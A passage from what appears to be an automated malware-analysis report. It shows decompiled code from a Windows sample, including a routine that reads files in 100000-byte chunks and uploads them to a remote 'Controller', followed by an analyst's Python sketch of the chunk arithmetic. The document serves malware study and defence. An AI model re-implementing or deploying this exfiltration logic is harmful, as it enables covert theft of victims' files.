                      																																			L127:
                      																																			_t308 = _t307 - _t292;
                      																																			__eflags = _t308;
                      																																			_t310 =  ~(_t308 >> 2);
                      																																		} else {
                      																																			_t225 = _v8;
                      																																			do {
                      																																				_t163 = E004444C3(_v12,  *_t307, _t225);
                      																																				_t323 = _t323 + 0xc;
                      																																				__eflags = _t163;
                      																																				if(_t163 != 0) {
                      																																					goto L126;
                      																																				} else {
                      																																					_t165 =  *((intOrPtr*)(_t225 +  *_t307));
                      																																					__eflags = _t165 - 0x3d;
                      																																					if(_t165 == 0x3d) {
                      																																						L129:
                      																																						_t310 = _t307 - _t292 >> 2;
                      																																					} else {
                      																																						__eflags = _t165;
                      																																						if(_t165 == 0) {
                      																																							goto L129;
                      																																						} else {
                      																																							goto L126;
                      																																						}
                      																																					}
                      																																				}
                      																																				goto L128;
                      																																				L126:
                      																																				_t307 =  &(_t307[1]);
                      																																				__eflags =  *_t307;
                      																																			} while ( *_t307 != 0);
                      																																			goto L127;
                      																																		}
                      																																		L128:
                      																																		return _t310;
                      																																	} else {
                      																																		goto L115;
                      																																	}
                      																																}
                      																																goto L130;
                      																																L115:
                      																																_t291 = _t291 + 4;
                      																																__eflags =  *_t291 - _t173;
                      																															} while ( *_t291 != _t173);
                      																															_t223 = 0;
                      																															__eflags = 0;
                      																															goto L117;
                      																														}
                      																													}
                      																												} else {
                      																													_t167 = 0;
                      																													L118:
                      																													return _t167;
                      																												}
                      																											} else {
                      																												goto L98;
                      																											}
                      																										}
                      																										goto L130;
                      																										L98:
                      																										_t290 = _t290 + 4;
                      																										__eflags =  *_t290 - _t180;
                      																									} while ( *_t290 != _t180);
                      																									goto L100;
                      																								}
                      																							}
                      																						} else {
                      																							_t175 = 0;
                      																							L101:
                      																							return _t175;
                      																						}
                      																					} else {
                      																						_t274 =  &(_t304[_v20 + 1]);
                      																						 *(_t274 - 2) = _t148;
                      																						asm("sbb eax, eax");
                      																						_t185 = SetEnvironmentVariableW(_t304,  !( ~(_v9 & 0x000000ff)) & _t274);
                      																						__eflags = _t185;
                      																						if(_t185 == 0) {
                      																							_t186 = E0043A504();
                      																							_t221 = _t221 | 0xffffffff;
                      																							__eflags = _t221;
                      																							 *_t186 = 0x2a;
                      																						}
                      																						goto L85;
                      																					}
                      																				}
                      																			}
                      																		}
                      																	}
                      																} else {
                      																	_t191 =  *0x46b4d0; // 0x3029b80
                      																	__eflags = _a4 - _t221;
                      																	if(_a4 == _t221) {
                      																		L58:
                      																		__eflags = _t246;
                      																		if(_t246 != 0) {
                      																			goto L56;
                      																		} else {
                      																			__eflags = _t191;
                      																			if(_t191 != 0) {
                      																				L62:
                      																				 *0x46b4d4 = E0043F348(_t246, 1, 4);
                      																				E004401F5(_t221);
                      																				_t322 = _t322 + 0xc;
                      																				goto L63;
                      																			} else {
                      																				 *0x46b4d0 = E0043F348(_t246, 1, 4);
                      																				E004401F5(_t221);
                      																				_t322 = _t322 + 0xc;
                      																				__eflags =  *0x46b4d0 - _t221; // 0x3029b80
                      																				if(__eflags == 0) {
                      																					goto L55;
                      																				} else {
                      																					_t302 =  *0x46b4d4; // 0x3029ce0
                      																					__eflags = _t302;
                      																					if(_t302 != 0) {
                      																						goto L64;
                      																					} else {
                      																						goto L62;
                      																					}
                      																				}
                      																			}
                      																		}
                      																	} else {
                      																		__eflags = _t191;
                      																		if(_t191 == 0) {
                      																			goto L58;
                      																		} else {
                      																			_t196 = L0043D3FB(_t221);
                      																			__eflags = _t196;
                      																			if(_t196 != 0) {
                      																				L63:
                      																				_t302 =  *0x46b4d4; // 0x3029ce0
                      																				__eflags = _t302;
                      																				if(_t302 == 0) {
                      																					L55:
                      																					_t221 = _t220 | 0xffffffff;
                      																					__eflags = _t221;
                      																					L56:
                      																					E004401F5(_t288);
                      																					_t136 = _t221;
                      																					goto L57;
                      																				} else {
                      																					goto L64;
                      																				}
                      																			} else {
                      																				goto L54;
                      																			}
                      																		}
                      																	}
                      																}
                      															}
                      														}
                      													} else {
                      														_t197 = E0043A504();
                      														 *_t197 = 0x16;
                      														_t136 = _t197 | 0xffffffff;
                      														L57:
                      														return _t136;
                      													}
                      												} else {
                      													_t280 = _v16 + 1 + _t300 - _a4;
                      													asm("sbb eax, eax");
                      													 *(_t280 - 1) = _t218;
                      													_t204 = SetEnvironmentVariableA(_t300,  !( ~(_v5 & 0x000000ff)) & _t280);
                      													__eflags = _t204;
                      													if(_t204 == 0) {
                      														_t205 = E0043A504();
                      														_t218 = _t218 | 0xffffffff;
                      														__eflags = _t218;
                      														 *_t205 = 0x2a;
                      													}
                      													goto L42;
                      												}
                      											}
                      										}
                      									}
                      								}
                      							} else {
                      								__eflags = _a8;
                      								if(_a8 == 0) {
                      									L14:
                      									__eflags = _t120;
                      									if(_t120 == 0) {
                      										 *0x46b4d0 = E0043F348(_t231, 1, 4);
                      										E004401F5(_t218);
                      										_t298 =  *0x46b4d0; // 0x3029b80
                      										_t320 = _t320 + 0xc;
                      										__eflags = _t298;
                      										if(_t298 == 0) {
                      											goto L11;
                      										} else {
                      											__eflags =  *0x46b4d4 - _t218; // 0x3029ce0
                      											if(__eflags != 0) {
                      												goto L20;
                      											} else {
                      												 *0x46b4d4 = E0043F348(_t231, 1, 4);
                      												E004401F5(_t218);
                      												_t320 = _t320 + 0xc;
                      												__eflags =  *0x46b4d4 - _t218; // 0x3029ce0
                      												if(__eflags == 0) {
                      													goto L11;
                      												} else {
                      													goto L19;
                      												}
                      											}
                      										}
                      									} else {
                      										_t218 = 0;
                      										goto L12;
                      									}
                      								} else {
                      									__eflags =  *0x46b4d4 - _t218; // 0x3029ce0
                      									if(__eflags == 0) {
                      										goto L14;
                      									} else {
                      										_t214 = L0043D3F6(0);
                      										__eflags = _t214;
                      										if(_t214 != 0) {
                      											L19:
                      											_t298 =  *0x46b4d0; // 0x3029b80
                      											L20:
                      											__eflags = _t298;
                      											if(_t298 == 0) {
                      												L11:
                      												_t218 = _t217 | 0xffffffff;
                      												__eflags = _t218;
                      												L12:
                      												E004401F5(_t286);
                      												_t119 = _t218;
                      												goto L13;
                      											} else {
                      												goto L21;
                      											}
                      										} else {
                      											goto L10;
                      										}
                      									}
                      								}
                      							}
                      						}
                      					}
                      				} else {
                      					_t215 = E0043A504();
                      					 *_t215 = 0x16;
                      					_t119 = _t215 | 0xffffffff;
                      					L13:
                      					return _t119;
                      				}
                      				L130:
                      			}
                      0x004476b6
                      0x004476bb
                      0x004476d2
                      0x004476d4
                      0x004476d9
                      0x004476dd
                      0x004476de
                      0x004476e0
                      0x00447730
                      0x00447735
                      0x00000000
                      0x004476e2
                      0x004476e2
                      0x004476e4
                      0x00000000
                      0x004476e6
                      0x004476e6
                      0x004476ea
                      0x004476f0
                      0x004476f3
                      0x004476f6
                      0x004476fc
                      0x004476ff
                      0x00447704
                      0x00447706
                      0x00447709
                      0x0044770a
                      0x0044770a
                      0x00447710
                      0x00447712
                      0x00447714
                      0x004477a8
                      0x004477ab
                      0x004477ad
                      0x004477af
                      0x004477b0
                      0x004477b1
                      0x004477b6
                      0x004477bb
                      0x004477bd
                      0x00447807
                      0x00447807
                      0x0044780a
                      0x00000000
                      0x00447810
                      0x00447810
                      0x00447812
                      0x00447815
                      0x00447815
                      0x00447818
                      0x0044781a
                      0x00000000
                      0x00447820
                      0x00447820
                      0x00447826
                      0x00000000
                      0x0044782c
                      0x0044782c
                      0x0044782e
                      0x00447836
                      0x00447838
                      0x0044783d
                      0x00447840
                      0x00447842
                      0x00000000
                      0x00447848
                      0x00447848
                      0x0044784b
                      0x0044784d
                      0x00447850
                      0x00447853
                      0x00000000
                      0x00447853
                      0x00447842
                      0x00447826
                      0x0044781a
                      0x004477bf
                      0x004477bf
                      0x004477c1
                      0x00000000
                      0x004477c3
                      0x004477c6
                      0x004477cc
                      0x004477cf
                      0x004477d2
                      0x004477e6
                      0x004477e6
                      0x004477e9
                      0x00000000
                      0x00000000
                      0x004477e2
                      0x004477e5
                      0x004477e5
                      0x004477e5
                      0x004477eb
                      0x004477ed
                      0x004477f5
                      0x004477f7
                      0x004477fc
                      0x004477ff
                      0x00447801
                      0x00447803
                      0x00447857
                      0x00447857
                      0x00447857
                      0x004477d4
                      0x004477d4
                      0x004477d7
                      0x004477d9
                      0x004477d9
                      0x0044785d
                      0x00447860
                      0x00000000
                      0x00447866
                      0x00447866
                      0x00447868
                      0x0044786b
                      0x0044786b
                      0x0044786d
                      0x0044786e
                      0x0044786e
                      0x0044787a
                      0x00447882
                      0x00447885
                      0x00447886
                      0x00447888
                      0x004478d1
                      0x004478d2
                      0x00000000
                      0x0044788a
                      0x00447891
                      0x00447896
                      0x00447899
                      0x0044789b
                      0x004478dd
                      0x004478de
                      0x004478df
                      0x004478e0
                      0x004478e1
                      0x004478e2
                      0x004478e7
                      0x004478eb
                      0x004478ed
                      0x004478f0
                      0x004478f1
                      0x004478f4
                      0x004478f6
                      0x00447908
                      0x00447909
                      0x0044790a
                      0x0044790d
                      0x0044790f
                      0x00447914
                      0x00447918
                      0x00447919
                      0x0044791b
                      0x0044796c
                      0x00447971
                      0x00000000
                      0x0044791d
                      0x0044791d
                      0x0044791f
                      0x00000000
                      0x00447921
                      0x00447921
                      0x00447927
                      0x00447929
                      0x0044792d
                      0x00447930
                      0x00447933
                      0x00447939
                      0x0044793b
                      0x0044793c
                      0x00447942
                      0x00447945
                      0x00447947
                      0x00447947
                      0x0044794d
                      0x0044794f
                      0x004479dc
                      0x004479e7
                      0x004479ea
                      0x004479ef
                      0x004479f4
                      0x004479f6
                      0x00447a40
                      0x00447a40
                      0x00447a43
                      0x00000000
                      0x00447a49
                      0x00447a49
                      0x00447a4b
                      0x00447a4e
                      0x00447a4e
                      0x00447a51
                      0x00447a53
                      0x00000000
                      0x00447a59
                      0x00447a59
                      0x00447a5f
                      0x00000000
                      0x00447a65
                      0x00447a65
                      0x00447a67
                      0x00447a6f
                      0x00447a71
                      0x00447a76
                      0x00447a79
                      0x00447a7b
                      0x00000000
                      0x00447a81
                      0x00447a81
                      0x00447a84
                      0x00447a86
                      0x00447a89
                      0x00447a8c
                      0x00000000
                      0x00447a8c
                      0x00447a7b
                      0x00447a5f
                      0x00447a53
                      0x004479f8
                      0x004479f8
                      0x004479fa
                      0x00000000
                      0x004479fc
                      0x004479ff
                      0x00447a05
                      0x00447a08
                      0x00447a0b
                      0x00447a1f
                      0x00447a1f
                      0x00447a22
                      0x00000000
                      0x00000000
                      0x00447a1b
                      0x00447a1e
                      0x00447a1e
                      0x00447a1e
                      0x00447a24
                      0x00447a26
                      0x00447a2e
                      0x00447a30
                      0x00447a35
                      0x00447a38
                      0x00447a3a
                      0x00447a3c
                      0x00447a90
                      0x00447a90
                      0x00447a90
                      0x00447a0d
                      0x00447a0d
                      0x00447a10
                      0x00447a12
                      0x00447a12
                      0x00447a96
                      0x00447a99
                      0x00000000
                      0x00447a9f
                      0x00447a9f
                      0x00447aa1
                      0x00447aa1
                      0x00447aa4
                      0x00447aa4
                      0x00447aa7
                      0x00447aaa
                      0x00447aaa
                      0x00447ab5
                      0x00447ab9
                      0x00447ac1
                      0x00447ac4
                      0x00447ac5
                      0x00447ac7
                      0x00447b0e
                      0x00447b0f
                      0x00000000
                      0x00447ac9
                      0x00447ad1
                      0x00447ad6
                      0x00447ad9
                      0x00447adb
                      0x00447b1a
                      0x00447b1b
                      0x00447b1c
                      0x00447b1d
                      0x00447b1e
                      0x00447b1f
                      0x00447b24
                      0x00447b27
                      0x00447b28
                      0x00447b2b
                      0x00447b2c
                      0x00447b2f
                      0x00447b31
                      0x00447b3a
                      0x00447b3c
                      0x00447b3e
                      0x00447b40
                      0x00447b42
                      0x00447b42
                      0x00447b45
                      0x00447b46
                      0x00447b46
                      0x00447b42
                      0x00447b57
                      0x00447b5a
                      0x00447b5b
                      0x00447b5d
                      0x00447bc4
                      0x00447bc4
                      0x00000000
                      0x00447b5f
                      0x00447b5f
                      0x00447b62
                      0x00447bb4
                      0x00447bb6
                      0x00447bbc
                      0x00000000
                      0x00447b64
                      0x00447b64
                      0x00447b67
                      0x00447b67
                      0x00447b69
                      0x00447b69
                      0x00447b6b
                      0x00447b6e
                      0x00447b6e
                      0x00447b70
                      0x00447b71
                      0x00447b71
                      0x00447b75
                      0x00447b7d
                      0x00447b87
                      0x00447b8a
                      0x00447b8f
                      0x00447b92
                      0x00447b96
                      0x00000000
                      0x00447b98
                      0x00447ba0
                      0x00447ba5
                      0x00447ba8
                      0x00447baa
                      0x00447bc9
                      0x00447bcb
                      0x00447bcc
                      0x00447bcd
                      0x00447bce
                      0x00447bcf
                      0x00447bd0
                      0x00447bd5
                      0x00447bd8
                      0x00447bd9
                      0x00447bdb
                      0x00447bdc
                      0x00447bdd
                      0x00447bde
                      0x00447be1
                      0x00447be3
                      0x00447bec
                      0x00447bed
                      0x00447bef
                      0x00447bf1
                      0x00447bf3
                      0x00447bf6
                      0x00447bf7
                      0x00447bf9
                      0x00447bfb
                      0x00447bfb
                      0x00447bfe
                      0x00447bff
                      0x00447bff
                      0x00447bfb
                      0x00447c0e
                      0x00447c12
                      0x00447c14
                      0x00447c82
                      0x00447c82
                      0x00000000
                      0x00447c16
                      0x00447c16
                      0x00447c18
                      0x00447c72
                      0x00447c73
                      0x00447c79
                      0x00000000
                      0x00447c1a
                      0x00447c1c
                      0x00447c1c
                      0x00447c1e
                      0x00447c1e
                      0x00447c20
                      0x00447c23
                      0x00447c23
                      0x00447c26
                      0x00447c29
                      0x00447c29
                      0x00447c39
                      0x00447c41
                      0x00447c47
                      0x00447c4c
                      0x00447c4f
                      0x00447c53
                      0x00000000
                      0x00447c55
                      0x00447c5d
                      0x00447c62
                      0x00447c65
                      0x00447c67
                      0x00447c87
                      0x00447c89
                      0x00447c8a
                      0x00447c8b
                      0x00447c8c
                      0x00447c8d
                      0x00447c8e
                      0x00447c93
                      0x00447c96
                      0x00447c99
                      0x00447c9a
                      0x00447c9b
                      0x00447c9c
                      0x00447ca2
                      0x00447ca4
                      0x00447ca7
                      0x00447cd3
                      0x00447cd3
                      0x00447cd3
                      0x00447cd8
                      0x00447ca9
                      0x00447ca9
                      0x00447cac
                      0x00447cb2
                      0x00447cb7
                      0x00447cba
                      0x00447cbc
                      0x00000000
                      0x00447cbe
                      0x00447cc0
                      0x00447cc3
                      0x00447cc5
                      0x00447ce1
                      0x00447ce3
                      0x00447cc7
                      0x00447cc7
                      0x00447cc9
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00447cc9
                      0x00447cc5
                      0x00000000
                      0x00447ccb
                      0x00447ccb
                      0x00447cce
                      0x00447cce
                      0x00000000
                      0x00447cac
                      0x00447cda
                      0x00447ce0
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00447c67
                      0x00000000
                      0x00447c69
                      0x00447c69
                      0x00447c6c
                      0x00447c6c
                      0x00447c70
                      0x00447c70
                      0x00000000
                      0x00447c70
                      0x00447c18
                      0x00447be5
                      0x00447be5
                      0x00447c7d
                      0x00447c81
                      0x00447c81
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00447baa
                      0x00000000
                      0x00447bac
                      0x00447bac
                      0x00447baf
                      0x00447baf
                      0x00000000
                      0x00447bb3
                      0x00447b62
                      0x00447b33
                      0x00447b33
                      0x00447bbf
                      0x00447bc3
                      0x00447bc3
                      0x00447add
                      0x00447ae1
                      0x00447ae4
                      0x00447aee
                      0x00447af6
                      0x00447afc
                      0x00447afe
                      0x00447b00
                      0x00447b05
                      0x00447b05
                      0x00447b08
                      0x00447b08
                      0x00000000
                      0x00447afe
                      0x00447adb
                      0x00447ac7
                      0x00447a99
                      0x004479fa
                      0x00447955
                      0x00447955
                      0x0044795a
                      0x0044795d
                      0x0044798a
                      0x0044798a
                      0x0044798c
                      0x00000000
                      0x0044798e
                      0x0044798e
                      0x00447990
                      0x004479bb
                      0x004479c5
                      0x004479ca
                      0x004479cf
                      0x00000000
                      0x00447992
                      0x0044799c
                      0x004479a1
                      0x004479a6
                      0x004479a9
                      0x004479af
                      0x00000000
                      0x004479b1
                      0x004479b1
                      0x004479b7
                      0x004479b9
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x004479b9
                      0x004479af
                      0x00447990
                      0x0044795f
                      0x0044795f
                      0x00447961
                      0x00000000
                      0x00447963
                      0x00447963
                      0x00447968
                      0x0044796a
                      0x004479d2
                      0x004479d2
                      0x004479d8
                      0x004479da
                      0x00447977
                      0x00447977
                      0x00447977
                      0x0044797a
                      0x0044797b
                      0x00447982
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0044796a
                      0x00447961
                      0x0044795d
                      0x0044794f
                      0x0044791f
                      0x004478f8
                      0x004478f8
                      0x004478fd
                      0x00447903
                      0x00447985
                      0x00447989
                      0x00447989
                      0x0044789d
                      0x004478a6
                      0x004478ae
                      0x004478b2
                      0x004478b9
                      0x004478bf
                      0x004478c1
                      0x004478c3
                      0x004478c8
                      0x004478c8
                      0x004478cb
                      0x004478cb
                      0x00000000
                      0x004478c1
                      0x0044789b
                      0x00447888
                      0x00447860
                      0x004477c1
                      0x0044771a
                      0x0044771a
                      0x0044771d
                      0x0044774e
                      0x0044774e
                      0x00447750
                      0x00447760
                      0x00447765
                      0x0044776a
                      0x00447770
                      0x00447773
                      0x00447775
                      0x00000000
                      0x00447777
                      0x00447777
                      0x0044777d
                      0x00000000
                      0x0044777f
                      0x00447789
                      0x0044778e
                      0x00447793
                      0x00447796
                      0x0044779c
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0044779c
                      0x0044777d
                      0x00447752
                      0x00447752
                      0x00000000
                      0x00447752
                      0x0044771f
                      0x0044771f
                      0x00447725
                      0x00000000
                      0x00447727
                      0x00447727
                      0x0044772c
                      0x0044772e
                      0x0044779e
                      0x0044779e
                      0x004477a4
                      0x004477a4
                      0x004477a6
                      0x0044773b
                      0x0044773b
                      0x0044773b
                      0x0044773e
                      0x0044773f
                      0x00447746
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0044772e
                      0x00447725
                      0x0044771d
                      0x00447714
                      0x004476e4
                      0x004476bd
                      0x004476bd
                      0x004476c2
                      0x004476c8
                      0x00447749
                      0x0044774d
                      0x0044774d
                      0x00000000

                      APIs
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: _free$EnvironmentVariable$___from_strstr_to_strchr_wcschr
                      • String ID:
                      • API String ID: 2719235668-0
                      • Opcode ID: 92e5fc07c61292dce9da1fbd4dd523a4cbef3373096b5782c7914504f2e5710a
                      • Instruction ID: db3f33f972ccc31960696266c8304923ec6ec277b5ade58ccf050fecc9e19cec
                      • Opcode Fuzzy Hash: 92e5fc07c61292dce9da1fbd4dd523a4cbef3373096b5782c7914504f2e5710a
                      • Instruction Fuzzy Hash: 15D148B1908300AFFB21AF758881A6F77A8EF05354F14416FE945A7382EB7D9902C79D
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 77%
                      			E004064A2(intOrPtr __ecx, void* __edx, WCHAR* _a4, char _a8, char _a32, char _a56) {
                      				void* _v12;
                      				union _LARGE_INTEGER _v16;
                      				struct _OVERLAPPED* _v20;
                      				long _v24;
                      				long _v28;
                      				intOrPtr _v32;
                      				long _v36;
                      				struct _OVERLAPPED* _v40;
                      				union _LARGE_INTEGER* _v44;
                      				signed int _v48;
                      				signed int _v52;
                      				struct %anon52 _v64;
                      				intOrPtr _v68;
                      				struct %anon52 _v80;
                      				union _LARGE_INTEGER _v84;
                      				intOrPtr _v88;
                      				char _v112;
                      				char _v136;
                      				char _v160;
                      				char _v184;
                      				char _v208;
                      				char _v232;
                      				char _v256;
                      				char _v280;
                      				char _v304;
                      				char _v328;
                      				char _v352;
                      				char _v376;
                      				char _v400;
                      				char _v424;
                      				char _v448;
                      				char _v472;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				struct %anon52 _t117;
                      				void* _t119;
                      				void* _t126;
                      				long _t136;
                      				void* _t137;
                      				signed int _t138;
                      				struct _OVERLAPPED* _t145;
                      				signed int _t148;
                      				void* _t154;
                      				void* _t156;
                      				void* _t157;
                      				void* _t173;
                      				long _t198;
                      				signed int _t203;
                      				void* _t216;
                      				union _LARGE_INTEGER _t280;
                      				intOrPtr _t281;
                      				union _LARGE_INTEGER* _t295;
                      				void* _t297;
                      				void* _t301;
                      				void* _t302;
                      				void* _t303;
                      				void* _t304;
                      				void* _t305;
                      
                      				_t278 = __edx;
                      				_v68 = __ecx;
                      				E0040498B(__ecx);
                      				_t302 = _t301 - 0x10;
                      				asm("movsd");
                      				asm("movsd");
                      				asm("movsd");
                      				asm("movsd");
                      				_t299 = _v68;
                      				E00404A08(__edx);
                      				_v28 = 0x186a0;                                          // chunk length: 100000 bytes per ReadFile
                      				_v20 = 0;
                      				_t297 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0);  // GENERIC_READ, FILE_SHARE_READ, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL
                      				_t310 = _t297 - 0xffffffff;
                      				if(_t297 != 0xffffffff) {
                      					_v80.LowPart = 0;
                      					_v80.HighPart = 0;
                      					__imp__GetFileSizeEx(_t297,  &_v80);
                      					_t203 = _v80.HighPart;
                      					_t117 = _v80;
                      					_v48 = _t203;
                      					_v32 = _t203;
                      					_v52 = _t117;
                      					_v16.LowPart = _t117;
                      					E0040427F(0,  &_v112, _a4);
                      					_t119 = E0041733B( &_v136,  &_v112);
                      					_t303 = _t302 - 0x18;
                      					_t280 = "Uploading file to Controller: ";
                      					E004075C2(0, _t303, _t280, _t297, __eflags, _t119);
                      					_t304 = _t303 - 0x14;
                      					E00402084(0, _t304, "[Info]");
                      					L00416C80(0, _t297);
                      					_t305 = _t304 + 0x30;
                      					L00401FC7();
                      					L00401EF0();
                      					_v36 = 1;
                      					_v40 = 0;
                      					_t126 = E00450880(_v52, _v48, 0x186a0, 0);            // __aulldiv (see API list): file size / 100000
                      					_t210 = _t280;
                      					asm("xorps xmm0, xmm0");
                      					_v88 = _t126 + 1;                                      // total chunk count reported to the controller (quotient + 1)
                      					asm("adc ecx, ebx");
                      					asm("movlpd [ebp-0x3c], xmm0");
                      					_v84.LowPart = _t280;
                      					__eflags = _v48;
                      					if(__eflags < 0) {
                      						L17:
                      						CloseHandle(_t297);
                      						L00404E0B(_t299);
                      						_t198 = 1;
                      					} else {
                      						if(__eflags > 0) {
                      							L5:
                      							_v44 = _v64.HighPart.LowPart;
                      							_v64.HighPart.LowPart = _v64;
                      							_t136 = 0x186a0;
                      							goto L6;
                      							do {
                      								do {
                      									L6:
                      									_t281 = _v32;
                      									__eflags = _v20 - _t281;
                      									if(__eflags >= 0) {
                      										_t210 = _v16.LowPart;
                      										if(__eflags > 0) {
                      											L9:
                      											_t136 = _t210;
                      											_v20 = _t281;
                      											_v28 = _t136;
                      										} else {
                      											__eflags = _t136 - _t210;
                      											if(__eflags > 0) {
                      												goto L9;
                      											}
                      										}
                      									}
                      									_push(_t136);
                      									_t137 = E0042F4C6(_t210, _t281, _t299, __eflags);
                      									_push(0);
                      									_v12 = _t137;
                      									_v24 = 0;
                      									_t138 = SetFilePointerEx(_t297, _v64.HighPart.LowPart, _v44, 0);
                      									__eflags = _t138;
                      									if(_t138 == 0) {
                      										_t306 = _t305 - 0x18;
                      										_t216 = _t305 - 0x18;
                      										_push("SetFilePointerEx error");
                      										goto L23;
                      									} else {
                      										_t148 = ReadFile(_t297, _v12, _v28,  &_v24, 0);
                      										__eflags = _t148;
                      										if(_t148 == 0) {
                      											_t306 = _t305 - 0x18;
                      											_t216 = _t305 - 0x18;
                      											_push("ReadFile error");
                      											L23:
                      											E00402084(0, _t216);
                      											E00402084(0, _t306 - 0x18, "[ERROR]");
                      											L00416C80(0, _t297);
                      											E0042F4CF(_v12);
                      											CloseHandle(_t297);
                      											goto L24;
                      										} else {
                      											__eflags = _v24;
                      											if(__eflags == 0) {
                      												E0042F4CF(_v12);
                      												CloseHandle(_t297);
                      												L00404E0B(_t299);
                      												_t145 = 1;
                      												goto L25;
                      											} else {
                      												E0040427F(0,  &_v112, _a4);
                      												_t154 = E004020AB(0,  &_v472, _t281, __eflags, _v12, _v24);
                      												_t305 = _t305 - 0x18;
                      												_t156 = E00417260(0x46c238,  &_v448, _v88, _v84);
                      												_t157 = E00417260(0x46c238,  &_v424, _v36, _v40);
                      												L00402F1D(_t305, L00402F93(0x46c238,  &_v136, L00402F93(0x46c238,  &_v160, L00402F93(0x46c238,  &_v184, L00402F1D( &_v208, L00402F93(0x46c238,  &_v232, L00402F1D( &_v256, L00402F93(0x46c238,  &_v280, L00402F93(0x46c238,  &_v304, L00402F93(0x46c238,  &_v328, L00402F93(0x46c238,  &_v352, L00402F93(0x46c238,  &_v376, E0041739C(0x46c238,  &_v400,  &_v112), __eflags, 0x46c238), __eflags,  &_a8), __eflags, 0x46c238), __eflags,  &_a32), __eflags, 0x46c238), _t157), __eflags, 0x46c238), _t156), __eflags, 0x46c238), __eflags,  &_a56), __eflags, 0x46c238), _t154);
                      												_t299 = _v68;
                      												_push(0x52);                                          // command id 0x52: one file chunk, sent through L00404AA4 -> send()
                      												_t173 = L00404AA4(0x46c238, _v68, _t171, __eflags);
                      												__eflags = _t173 - 0xffffffff;
                      												L00401FC7();
                      												L00401FC7();
                      												L00401FC7();
                      												L00401FC7();
                      												L00401FC7();
                      												L00401FC7();
                      												L00401FC7();
                      												L00401FC7();
                      												L00401FC7();
                      												L00401FC7();
                      												L00401FC7();
                      												L00401FC7();
                      												L00401FC7();
                      												L00401FC7();
                      												L00401FC7();
                      												L00401EF0();
                      												__eflags = 0x46c200 | _t173 == 0xffffffff;
                      												if((0x46c200 | _t173 == 0xffffffff) != 0) {
                      													L00404E0B(_t299);
                      													CloseHandle(_t297);
                      													E0042F4CF(_v12);
                      													_t198 = 0;
                      												} else {
                      													goto L14;
                      												}
                      											}
                      										}
                      									}
                      									goto L18;
                      									L14:
                      									E0042F4CF(_v12);
                      									_t136 = _v28;
                      									_v16.LowPart = _v16 - _t136;
                      									_t295 = _v44;
                      									asm("sbb ecx, [ebp-0x10]");
                      									_v36 = _v36 + 1;
                      									_push(0);
                      									_pop(0);
                      									asm("adc [ebp-0x24], ebx");
                      									_t210 = _v64.HighPart.LowPart + _t136;
                      									_v64.HighPart = _t210;
                      									asm("adc edx, [ebp-0x10]");
                      									_v44 = _t295;
                      									__eflags = _t295 - _v48;
                      								} while (__eflags < 0);
                      								if(__eflags > 0) {
                      									goto L17;
                      								} else {
                      									goto L16;
                      								}
                      								goto L18;
                      								L16:
                      								__eflags = _t210 - _v52;
                      							} while (_t210 < _v52);
                      							goto L17;
                      						} else {
                      							__eflags = _v52;
                      							if(_v52 <= 0) {
                      								goto L17;
                      							} else {
                      								goto L5;
                      							}
                      						}
                      					}
                      				} else {
                      					E004020EC(0, _t302 - 0x18, _t278, _t310,  &_a8);
                      					_push(0x53);                                          // command id 0x53: CreateFileW failed, error report sent through L00404AA4 -> send()
                      					L00404AA4(0, 0x46c2e8, _t278, _t310);
                      					L24:
                      					L00404E0B(_t299);
                      					_t145 = 0;
                      					L25:
                      					_t198 = _t145;
                      				}
                      				L18:
                      				L00401FC7();
                      				L00401FC7();
                      				L00401FC7();
                      				return _t198;
                      			}
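The routine above reads the target file in 100000-byte (0x186a0) pieces, computes a chunk total with __aulldiv, and tags every piece with a 1-based counter before handing it to the send path with command id 0x52. The following is an added example (not code from the sample or from Joe Sandbox) that re-implements only the offset and length arithmetic visible in the decompiled loop, so an analyst can predict how many 0x52 messages a given file produces. It does not model the wire format, which the report does not show; the function and class names are this example's own.

```python
"""Chunk plan for the file-upload loop decompiled above (added example).

Reproduces only what the decompiled code shows: a fixed 100000-byte chunk,
a total of size // 100000 + 1 from the __aulldiv call, a 1-based counter,
a trailing chunk shortened to the bytes that remain, and a loop that stops
once the file offset reaches the file size. No network code, no framing.
"""
from dataclasses import dataclass
from typing import List

CHUNK_SIZE = 0x186A0  # 100000 bytes, the constant passed to ReadFile above


@dataclass(frozen=True)
class Chunk:
    index: int   # 1-based counter carried with each chunk (_v36 in the listing)
    total: int   # advertised total, file_size // CHUNK_SIZE + 1 (_v88 in the listing)
    offset: int  # position passed to SetFilePointerEx
    length: int  # byte count requested from ReadFile (_v28 in the listing)


def plan_upload(file_size: int, chunk_size: int = CHUNK_SIZE) -> List[Chunk]:
    """Return the chunks the loop would read and send for a file of file_size bytes."""
    if file_size < 0:
        raise ValueError("file size must be non-negative")
    total = file_size // chunk_size + 1  # quotient + 1, as in the listing
    chunks: List[Chunk] = []
    offset = 0
    remaining = file_size
    index = 1
    # Loop guard from the listing: keep going while offset < file size
    # (the 64-bit compare of the offset against the GetFileSizeEx result).
    while offset < file_size:
        # When fewer than chunk_size bytes remain, the request shrinks to the remainder.
        length = chunk_size if remaining > chunk_size else remaining
        chunks.append(Chunk(index, total, offset, length))
        offset += length
        remaining -= length
        index += 1
    return chunks


def advertised_total_overstates(file_size: int, chunk_size: int = CHUNK_SIZE) -> bool:
    """True when the reported total is one more than the number of chunks actually sent.

    This happens for an empty file and for any size that is an exact multiple of the
    chunk size: the quotient is incremented unconditionally, while the loop stops
    exactly at the end of the file and never issues the extra read.
    """
    return file_size % chunk_size == 0


if __name__ == "__main__":
    for c in plan_upload(250000):
        print(c)
    print("overstated total for 200000 bytes:", advertised_total_overstates(200000))
```

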